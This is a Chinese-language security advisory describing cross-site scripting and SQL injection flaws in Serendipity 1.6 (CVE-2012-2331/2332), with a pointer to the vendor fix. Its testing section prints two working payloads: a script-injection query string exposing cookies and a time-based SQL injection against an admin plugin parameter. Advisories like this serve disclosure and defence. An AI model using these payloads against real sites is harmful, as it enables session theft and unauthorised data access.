Serendipity 跨站脚本执行/SQL注入漏洞

发布日期:2012-05-08
更新日期:2012-08-29

受影响系统:
Serendipity Serendipity 1.6
不受影响系统:
Serendipity Serendipity 1.6.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53418
CVE ID: CVE-2012-2331,CVE-2012-2332

Serendipity是用PHP编写的博客/CMS应用。

Serendipity 1.6及其他版本在实现上存在SQL注入和跨站脚本执行漏洞,成功利用这些漏洞可允许攻击者运行恶意脚本代码、窃取Cookie身份验证凭证、控制应用、访问或修改数据等。

<*来源:Stefan Schurtz
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Cross Site-Scripting:
?serendipity[textarea]='"&lt;/script&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;

SQL-Injection:
?serendipity[adminModule]=plugins&amp;serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+

建议:
--------------------------------------------------------------------------------
厂商补丁:

Serendipity
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wysjdx.html